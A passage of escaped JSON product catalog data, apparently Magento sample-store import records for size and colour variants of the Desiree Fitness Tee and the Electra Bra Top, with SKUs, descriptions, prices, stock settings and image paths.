keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1536\":{\"sku\":\"WS05-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-L-Orange\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1537\":{\"sku\":\"WS05-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-L-Yellow\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1538\":{\"sku\":\"WS05-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-XL-Black\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1539\":{\"sku\":\"WS05-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-XL-Orange\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1540\":{\"sku\":\"WS05-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee-XL-Yellow\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"desiree-fitness-tee-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1541\":{\"sku\":\"WS05\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\",\"product_websites\":\"base\",\"name\":\"Desiree Fitness Tee\",\"description\":\"<p>When you\'re too far to turn back, thank yourself for choosing the Desiree Fitness Tee. Its ultra-lightweight, ultra-breathable fabric wicks sweat away from your body and helps keeps you cool for the distance.<\\/p>\\n<p>&bull; Short-Sleeves.<br \\/>&bull; Performance fabric.<br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=HeatTec&reg;|Polyester,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WS05-XS-Black,size=XS,color=Black|sku=WS05-XS-Orange,size=XS,color=Orange|sku=WS05-XS-Yellow,size=XS,color=Yellow|sku=WS05-S-Black,size=S,color=Black|sku=WS05-S-Orange,size=S,color=Orange|sku=WS05-S-Yellow,size=S,color=Yellow|sku=WS05-M-Black,size=M,color=Black|sku=WS05-M-Orange,size=M,color=Orange|sku=WS05-M-Yellow,size=M,color=Yellow|sku=WS05-L-Black,size=L,color=Black|sku=WS05-L-Orange,size=L,color=Orange|sku=WS05-L-Yellow,size=L,color=Yellow|sku=WS05-XL-Black,size=XL,color=Black|sku=WS05-XL-Orange,size=XL,color=Orange|sku=WS05-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"image\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws05-black_alt1.jpg,\\/w\\/s\\/ws05-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"HeatTec&reg;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1542\":{\"sku\":\"WB01-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-XS-Black\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1543\":{\"sku\":\"WB01-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-XS-Gray\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},\"1544\":{\"sku\":\"WB01-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-XS-Purple\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 